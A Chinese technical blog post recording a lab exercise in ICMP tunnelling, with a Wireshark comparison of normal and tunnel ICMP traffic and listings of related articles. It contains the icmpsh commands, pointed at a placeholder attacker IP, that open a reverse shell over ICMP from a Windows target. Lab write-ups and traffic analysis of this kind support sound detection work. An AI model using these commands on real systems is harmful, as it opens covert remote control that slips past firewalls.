ICMP隧道攻击

于 2025-05-04 01:25:42 发布
阅读量427 收藏 6
点赞数 5
CC 4.0 BY-SA版权
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Rick66Ashley/article/details/147689228

关于ICMP协议

1.ICMP协议的全称是互联网控制消息协议,基于IP协议发送控制消息,控制消息指的就是网络通不通,主机是否可达,路由是否可用

2.ICMP主要应用在各种网络诊断工具中,最主要的就是ping。ping可以知道对面的主机是否与自己联通

3.ICMP包可以携带少量的数据,一般来说icmp请求包和返回包的Data部分都是一样的

关于ICMP隧道攻击

由于ICMP流量会被防火墙忽略或者不完全检测,所以攻击者利用其隐蔽性,可以搭建一条ICMP隧道对靶机实现控制。缺点是不太稳定

实验

目标:用icmpsh实现反弹shell,实现攻击机对靶机的控制,同时记录并分析正常的icmp流量和icmp隧道流量的不同

攻击机:Kal-Linux-2024.1;靶机:Windows 11,两者处于同一虚拟网络中

注意icmpsh需要clone依赖项Impacket并且安装。(clone+setup.py)

在安装目录下:

sudo python2 ./icmpsh_m.py [attacker_ip] [target_ip]

 

在靶机上:

把安装目录的icmpsh.exe复制到某个目录下,打开cmd

icmpsh.exe -t [attacker_ip]

 

这样一来就成功的反弹shell了

0

用wireshark抓取流量发现如下特征:

1.ICMP包数量较大

1

2.request和reply的Data部分是不同的

这个是隧道部分流量的request和reply(注意我是在靶机上监控的流量,所以攻击机反而成了reply)

reply

2

request

3

正常部分的reply和request的Data部分均为

4

3.Data部分和正常的icmp包有所区别

前者的Data长度在实验中是64,后者是40,差异还是很明显的

Rick66Ashley
关注
[车联网安全自学篇] ATTACK安全之Android ICMP隧道攻击原理与入侵检测实践
橙留香Park的博客
07-07 453
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大少走了弯路,也就错过了风景,无论如何,感谢经历随着智能手机越来越普及,以及3G、4G、5G网络的快速发展,越来越多的用户使用手机上网冲浪。于此同时,各类恶意软件也通过网络来盗取用户手机上的的隐私,甚至控制用户的手机,因此智能手机上的防火墙应运而生Android 通常是一个安全的操作系统,但如上所说在浏览互联网或安装应用程序的修改版本时可能会遇到恶意网站,此类恶意网站使Android系统中的个人信息和数据处于危险之中,使
隐秘通信-使用PingTunnel搭建ICMP隧道实验
帮助别人等于帮助自己 ——MXi4oyu
08-09 1273
Internet Control Message Protocol Internet控制报文协议,简称ICMP协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能,一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。
内网渗透之ICMP隧道
最新发布
没有网络安全就没有国家安全
03-07 1036
内网渗透之ICMP隧道
剑走偏锋之ICMP隧道
爱测未来团队博客
02-27 2510
写在前面信息安全里面攻击与防御一直都是像是光与影子得关系,防御得手段多种多样,攻击得方法也是花样百出。在一些高难度得渗透测试过程中往往会遇到比较完善得安全防护策略、安全防护硬件、安全防护软件,一个小小得恶意动作或者一段恶意代码得运行都可能会引起安全设备向管理员发起警告,如果渗透方已经到达内网寻找数据阶段被防守方发现了那不就是前功尽弃或者得不偿失呢,渗透方如果能够通过技术手段隐藏自己得攻击过程或者痕...
icmp报文格式_隧道攻防之ICMP隧道
weixin_39853863的博客
11-24 721
ICMP隧道简介icmp协议简介ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。ICMP的报文格式如下:其中0-31是各...
[免费专栏] ATTACK安全之Android ICMP隧道攻击原理与入侵检测实践
橙留香Park的博客
08-22 4256
转移发布平台通知:将不再在优快云博客发布新文章,敬请移步知识星球... ...
icmp隧道
weixin_30644369的博客
10-09 357
上次分享了利用icmp隧道进行常规端口的转发,也是APT攻击者经常使用的攻击手法之一。APT攻击者除了使用icmp进行常规端口转发以外,还经常用于穿透企业的防火墙,通过把TCP或者UDP数据包封装进ICMP协议中,对数据进行转发。在服务器上不需要服务器开任何端口,只需服务器开通icmp协议,能够ping通该地址,就可以对其进行远程控制。首先需要在被控主机上安装icmpshell,对其进...
内网渗透系列:内网隧道icmptunnel(DhavalKapil师傅的)
闵行小鱼塘
04-10 2788
本文研究ICMP隧道的一个工具,DhavalKapil师傅的icmptunnel
浅析Icmp原理及隐蔽攻击的方式
MSB_WLAQ的博客
10-13 2729
一、ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用 ICMP协议主要提供两种功能, 一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。常见的差.
渗透测试笔记】之【内网渗透——网络层隧道icmpsh、PingTunnel的使用:icmp隧道反向shell(1)
2401_84971029的博客
05-13 360
CentOS7(边界服务器,跳板机):192.168.8.35。Windows2012(受害机):192.168.8.18。Windows2012(内网服务器):10.1.1.10。kali(攻击机):192.168.8.48。kali(攻击机):192.168.8.48。方式二:官网下载安装。
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 383
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
网络安全技术之内网安全-03-ICMP隧道
caigai5424的博客
07-10 940
icmp隧道技术,绕过防火墙限制
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8300
icmp隧道的利用
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3525
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 2734
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
内网渗透之icmp隧道传输
qq_55894976的博客
08-16 1075
为什么要建立隧道在实际的网络中,通常会通过各种边界设备·软/硬件防火墙、入侵检测系统来检查对外连接的情况,如果发现异常,会对通信进行阻断。​# 什么是隧道就是一种绕过端口屏蔽的方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信,当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上​#常见的隧道列举如下:网络层:ipv6隧道 icmp隧道 gre隧道传输层:TCP隧道 UDP隧道 常规端口转发。
内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线
Javachichi的博客
02-12 2569
SMB(Server Message Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
ICMP隧道搭建
dzqxwzoe的博客
08-09 192
通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。
如何防止基于ICMP的网络攻击
热门推荐
Louis的专栏
08-21 1万+
如何防止基于ICMP的网络攻击     许多网络攻击都基于ICMP协议。在下面这篇文章里,我们将首先介绍ICMP协议,然后探究常见的基于ICMP的网络攻击,最后分析防火墙怎样才能够防止和减轻这种攻击所造成的危害。     如何防止基于ICMP的网络攻击     ■作者:Nathan Ashelman     ICMP(Internet控制消息协议, Int
ICMP隧道搭建原理
01-07
### ICMP 隧道的工作原理 ICMP (Internet 控制消息协议) 主要用于在网络设备之间传递控制信息和错误报告。由于许多防火墙默认允许 ICMP 流量通过,这使得攻击者可以利用 ICMP 数据包来创建隐蔽通道,即所谓的 ICMP 隧道。 #### 工作机制 ICMP隧道的核心在于封装技术。通常情况下,正常的ICMP数据报只携带少量的信息,如回显请求或应答。但在构建ICMP隧道时,攻击者会将其他类型的网络流量(例如TCP/IP通信)嵌入到ICMP负载中[^1]。当这些被修改过的ICMP数据包到达目标主机后,专门设计的应用程序能够解析并提取原始的数据流,从而实现绕过某些安全措施的目的。 #### 实现细节 为了建立一个有效的ICMP隧道,至少需要两部分组件: - **客户端软件**:负责发送带有隐藏有效载荷的ICMP Echo Request(Type 8),并将接收到的标准Echo Reply中的内容解码还原成实际传输的数据。 - **服务器端应用**:接收来自互联网上的ICMP Echo Requests,并从中抽取真实意图传达的消息;之后再构造相应的响应——通常是标准形式的Echo Replies(Type 0),其中包含了返回给发起者的反馈信息。 这种做法依赖于双方都安装有特定版本的支持该功能的应用层工具。此外,还需要注意的是,在现代网络安全环境中,越来越多的企业级防护系统已经开始加强对异常模式下的ICMP活动监测力度,因此纯粹依靠传统方法实施此类操作的成功率正在逐渐降低[^2]。 ```bash # 这里展示了一个简单的命令行示例,用来测试基本的ICMP连通性, # 并不是真正的ICMP隧道代码。 ping -c 4 example.com ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值